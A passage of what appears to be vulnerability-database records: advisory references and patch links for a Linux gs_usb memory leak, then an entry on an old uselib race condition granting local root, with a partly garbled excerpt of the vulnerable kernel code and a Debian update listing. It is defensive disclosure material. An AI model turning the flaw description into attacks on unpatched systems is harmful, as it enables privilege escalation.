      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4346.2",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4704",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0766",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.1745",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0830",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0141",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4584",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-151460",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-19052",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "155853",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "155855",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "155854",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "155866",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-151460"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-19052"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012046"
      },
      {
        "db": "PACKETSTORM",
        "id": "155856"
      },
      {
        "db": "PACKETSTORM",
        "id": "155853"
      },
      {
        "db": "PACKETSTORM",
        "id": "155855"
      },
      {
        "db": "PACKETSTORM",
        "id": "155854"
      },
      {
        "db": "PACKETSTORM",
        "id": "155867"
      },
      {
        "db": "PACKETSTORM",
        "id": "155995"
      },
      {
        "db": "PACKETSTORM",
        "id": "155866"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19052"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1073"
      }
    ]
  },
  "id": "VAR-201911-1405",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-151460"
      }
    ],
    "trust": 0.725
  },
  "last_update_date": "2023-12-18T11:40:24.066000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "ChangeLog-5.3.11",
        "trust": 0.8,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/changelog-5.3.11"
      },
      {
        "title": "can: gs_usb: gs_can_open(): prevent memory leak",
        "trust": 0.8,
        "url": "https://github.com/torvalds/linux/commit/fb5be6a7b4863ecc44963bb80ca614584b6c7817"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org"
      },
      {
        "title": "Linux kernel Remediation of resource management error vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=103403"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4228-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-xenial, linux-aws vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4228-2"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-aws-hwe, linux-azure, linux-gcp, linux-gke-4.15, linux-hwe, linux-kvm, linux-oem, linux-oracle, linux-raspi2, linux-snapdragon vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4227-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-azure vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4227-2"
      },
      {
        "title": "Ubuntu Security Notice: linux-hwe vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4225-2"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-azure, linux-azure-5.3, linux-gcp, linux-gcp-5.3, linux-kvm, linux-oracle, linux-raspi2 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4225-1"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-aws-5.0, linux-azure, linux-gcp, linux-gke-5.0, linux-kvm, linux-oem-osp1, linux-oracle, linux-oracle-5.0, linux-raspi2 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4226-1"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2019-19052 "
      },
      {
        "title": "cve_diff_checker",
        "trust": 0.1,
        "url": "https://github.com/lcatro/cve_diff_checker "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-19052"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012046"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1073"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-401",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-400",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-151460"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012046"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19052"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "https://usn.ubuntu.com/4228-1/"
      },
      {
        "trust": 2.4,
        "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00013.html"
      },
      {
        "trust": 2.4,
        "url": "https://usn.ubuntu.com/4225-1/"
      },
      {
        "trust": 2.4,
        "url": "https://usn.ubuntu.com/4226-1/"
      },
      {
        "trust": 2.4,
        "url": "https://usn.ubuntu.com/4227-1/"
      },
      {
        "trust": 2.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19052"
      },
      {
        "trust": 1.8,
        "url": "https://security.netapp.com/advisory/ntap-20191205-0001/"
      },
      {
        "trust": 1.8,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/changelog-5.3.11"
      },
      {
        "trust": 1.8,
        "url": "https://github.com/torvalds/linux/commit/fb5be6a7b4863ecc44963bb80ca614584b6c7817"
      },
      {
        "trust": 1.8,
        "url": "https://www.oracle.com/security-alerts/cpuapr2021.html"
      },
      {
        "trust": 1.8,
        "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00001.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00029.html"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/4225-2/"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/4227-2/"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/4228-2/"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-19052"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19524"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18660"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19534"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14895"
      },
      {
        "trust": 0.6,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00237.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193200-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193381-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2020/suse-su-20200093-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193316-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193317-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-five-vulnerabilities-via-memory-leak-30910"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/155867/ubuntu-security-notice-usn-4227-2.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4704/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/155995/ubuntu-security-notice-usn-4225-2.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0766/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0052/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4793/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0851/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.1745.2/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4584/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0830/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0200/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0141/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/155856/ubuntu-security-notice-usn-4228-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.1745/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4346.2/"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16231"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19045"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19529"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18813"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19807"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19072"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19055"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16233"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19083"
      },
      {
        "trust": 0.2,
        "url": "https://usn.ubuntu.com/4228-1"
      },
      {
        "trust": 0.2,
        "url": "https://usn.ubuntu.com/4225-1"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19051"
      },
      {
        "trust": 0.2,
        "url": "https://usn.ubuntu.com/4227-1"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/401.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2019-19052"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1100.111"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.4.0-1131.139"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.4.0-1127.136"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.4.0-171.200"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.4.0-1064.71"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.3.0-1009.10"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.3/5.3.0-1010.11~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-5.3/5.3.0-1009.10~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19047"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19044"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.3.0-1009.10"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.3.0-1011.12"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.3.0-26.28"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/5.3.0-1015.17"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.3.0-1009.10"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.3.0-1008.9"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1052.52"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1070.77"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-74.84"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/4.15.0-1066.71"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-4.15/4.15.0-1050.53"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem/4.15.0-1066.76"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1031.34~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1057.59"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1053.57"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/4.15.0-74.83~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-hwe/4.15.0-1057.59~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1052.56"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1031.34"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1028.30"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1028.30~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19048"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/5.0.0-1024.25"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.0.0-1024.26"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.0/5.0.0-1009.14~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.0.0-1028.29"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.0.0-1023.26"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19065"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19060"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10220"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19067"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2214"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19526"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4226-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-5.0/5.0.0-1027.28~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19922"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14901"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.0.0-38.41"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17075"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem-osp1/5.0.0-1033.38"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17133"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.0.0-1009.14"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19075"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19532"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-5.0/5.0.0-1023.26~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4227-2"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/5.3.0-26.28~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4225-2"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4228-2"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-151460"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-19052"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012046"
      },
      {
        "db": "PACKETSTORM",
        "id": "155856"
      },
      {
        "db": "PACKETSTORM",
        "id": "155853"
      },
      {
        "db": "PACKETSTORM",
        "id": "155855"
      },
      {
        "db": "PACKETSTORM",
        "id": "155854"
      },
      {
        "db": "PACKETSTORM",
        "id": "155867"
      },
      {
        "db": "PACKETSTORM",
        "id": "155995"
      },
      {
        "db": "PACKETSTORM",
        "id": "155866"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19052"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1073"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-151460"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-19052"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012046"
      },
      {
        "db": "PACKETSTORM",
        "id": "155856"
      },
      {
        "db": "PACKETSTORM",
        "id": "155853"
      },
      {
        "db": "PACKETSTORM",
        "id": "155855"
      },
      {
        "db": "PACKETSTORM",
        "id": "155854"
      },
      {
        "db": "PACKETSTORM",
        "id": "155867"
      },
      {
        "db": "PACKETSTORM",
        "id": "155995"
      },
      {
        "db": "PACKETSTORM",
        "id": "155866"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19052"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1073"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-11-18T00:00:00",
        "db": "VULHUB",
        "id": "VHN-151460"
      },
      {
        "date": "2019-11-18T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-19052"
      },
      {
        "date": "2019-11-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-012046"
      },
      {
        "date": "2020-01-07T16:46:53",
        "db": "PACKETSTORM",
        "id": "155856"
      },
      {
        "date": "2020-01-07T16:46:28",
        "db": "PACKETSTORM",
        "id": "155853"
      },
      {
        "date": "2020-01-07T16:46:45",
        "db": "PACKETSTORM",
        "id": "155855"
      },
      {
        "date": "2020-01-07T16:46:38",
        "db": "PACKETSTORM",
        "id": "155854"
      },
      {
        "date": "2020-01-08T00:40:16",
        "db": "PACKETSTORM",
        "id": "155867"
      },
      {
        "date": "2020-01-18T14:53:54",
        "db": "PACKETSTORM",
        "id": "155995"
      },
      {
        "date": "2020-01-08T00:40:10",
        "db": "PACKETSTORM",
        "id": "155866"
      },
      {
        "date": "2019-11-18T06:15:11.827000",
        "db": "NVD",
        "id": "CVE-2019-19052"
      },
      {
        "date": "2019-11-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201911-1073"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-01-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-151460"
      },
      {
        "date": "2022-11-08T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-19052"
      },
      {
        "date": "2019-11-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-012046"
      },
      {
        "date": "2023-01-19T16:48:31.577000",
        "db": "NVD",
        "id": "CVE-2019-19052"
      },
      {
        "date": "2021-06-15T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201911-1073"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1073"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel Vulnerable to resource exhaustion",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012046"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "overflow, arbitrary",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "155856"
      },
      {
        "db": "PACKETSTORM",
        "id": "155853"
      },
      {
        "db": "PACKETSTORM",
        "id": "155855"
      },
      {
        "db": "PACKETSTORM",
        "id": "155854"
      },
      {
        "db": "PACKETSTORM",
        "id": "155867"
      },
      {
        "db": "PACKETSTORM",
        "id": "155995"
      },
      {
        "db": "PACKETSTORM",
        "id": "155866"
      }
    ],
    "trust": 0.7
  }
}

var-200501-0463
Vulnerability from variot

Race condition in the (1) load_elf_library and (2) binfmt_aout function calls for uselib in Linux kernel 2.4 through 2.429-rc2 and 2.6 through 2.6.10 allows local users to execute arbitrary code by manipulating the VMA descriptor. Linux Kernel of (1) load_elf_library() function, (2) binfmt_aout() Functions include brk There is a flaw in the handling of the segment that causes a race condition.root You may get permission. Linux kernel is reported prone to a local privilege-escalation vulnerability. This issue arises in the 'uselib()' functions of the Linux binary-format loader as a result of a race condition. Successful exploitation of this vulnerability can allow a local attacker to gain elevated privileges on a vulnerable computer. The ELF and a.out loaders are reportedly affected by this vulnerability. The Linux kernel provides a binary format loader layer to load programs in different formats such as ELF or a.out or others, and the kernel also provides the sys_uselib() function to load corresponding binary programs. From the analysis of the uselib function of load_elf_library() in the binfmt_elf.c file, there is a problem in the processing of the BRK segment (VMA) of the library. This segment is established through current->mm->mmap_sem. When modifying the memory layout of the calling process\ '\' semaphore \'\' (semaphore) is not maintained, this can be used to mess with memory management and elevate privileges. Part of the source code fs/binfmt_elf.c is as follows: static int load_elf_library(struct file *file) { [904] down_write(¤t->mm->mmap_sem); error = do_mmap(file, ELF_PAGESTART(elf_phdata->p_vaddr), ( elf_phdata- > p_filesz + ELF_PAGEOFFSET(elf_phdata- > p_vaddr)), PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_PRIVATE | MAP_DENYWRITE, (elf_phdata- > p_offset - ELF_PAGEOFFSET(elf_phdata- > p_vaddr))); >mmap_sem); if (error != ELF_PAGESTART(elf_phdata->p_vaddr)) goto out_free_ph;.


Want to join the Secunia Security Team?

Secunia offers a position as a security specialist, where your daily work involves reverse engineering of software and exploit code, auditing of source code, and analysis of vulnerability reports.

http://secunia.com/secunia_security_specialist/


TITLE: Debian update for kernel-source-2.4.17

SECUNIA ADVISORY ID: SA20338

VERIFY ADVISORY: http://secunia.com/advisories/20338/

CRITICAL: Moderately critical

IMPACT: Exposure of system information, Exposure of sensitive information, Privilege escalation, DoS, System access

WHERE:

From remote

OPERATING SYSTEM: Debian GNU/Linux 3.0 http://secunia.com/product/143/

DESCRIPTION: Debian has issued an update for kernel-source-2.4.17. This fixes some vulnerabilities, which can be exploited by malicious, local users to gain knowledge of sensitive information, cause a DoS (Denial of Service), gain escalated privileges, and by malicious people to cause a DoS, and disclose potentially sensitive information.

For more information: SA10533 SA11464 SA11861 SA11943 SA13232 SA13469 SA13126 SA13308 SA13627 SA13756 SA13493 SA13822 SA14295 SA14570 SA13784

SOLUTION: Apply updated packages.

-- Debian GNU/Linux 3.0 alias woody --

Source archives:

http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-hppa_32.5.dsc Size/MD5 checksum: 713 6ff55b14d3ae957c55bbed7fabf4c047 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-hppa/kernel-image-2.4.17-hppa_32.5.tar.gz Size/MD5 checksum: 30437486 86601103169da686167972e5e560e3d4 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-ia64_011226.18.dsc Size/MD5 checksum: 736 f97d95c6ecc26401f8f2fc2ead6cf421 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-ia64_011226.18.tar.gz Size/MD5 checksum: 25419305 9bc354f889edd4964840475400b088b7 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-image-2.4.17-s390_2.4.17-2.woody.5.dsc Size/MD5 checksum: 800 d20db4ab99e311150734b70519cc31e9 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-s390/kernel-image-2.4.17-s390_2.4.17-2.woody.5.tar.gz Size/MD5 checksum: 12283 f51a7e01941baca7010fb8c2f0f67fe3 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-patch-2.4.17-apus_2.4.17-6.dsc Size/MD5 checksum: 694 2d48f4cfa4917904b6c1f806ecc1bdb4 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-apus/kernel-patch-2.4.17-apus_2.4.17-6.tar.gz Size/MD5 checksum: 491935 94638c0c03b6b163f46319e777d4aa71 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody7.dsc Size/MD5 checksum: 805 b48cbc9c2cd59eee3a52f54cfa5356e0 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/kernel-patch-2.4.17-mips_2.4.17-0.020226.2.woody7.tar.gz Size/MD5 checksum: 1150966 6748462e7bce7c917e066e0594d42571 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-s390/kernel-patch-2.4.17-s390_0.0.20020816-0.woody.4.dsc Size/MD5 checksum: 664 f49e9cba55a8a4b098e5dc522f2a07fc http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-s390/kernel-patch-2.4.17-s390_0.0.20020816-0.woody.4.tar.gz Size/MD5 checksum: 344642 3a488cc38ffc619bfff4bfbb75eff4cd http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17-1woody4.dsc Size/MD5 checksum: 609 4e0f66c1811cfb9e926c21566e55b202 http://security.debian.org/pool/updates/main/k/kernel-source-2.4.17/kernel-source-2.4.17_2.4.17-1woody4.tar.gz Size/MD5 checksum: 29768549 bc1f8eab880a33bfe2ebeb3ef8b6557a

Architecture independent components:

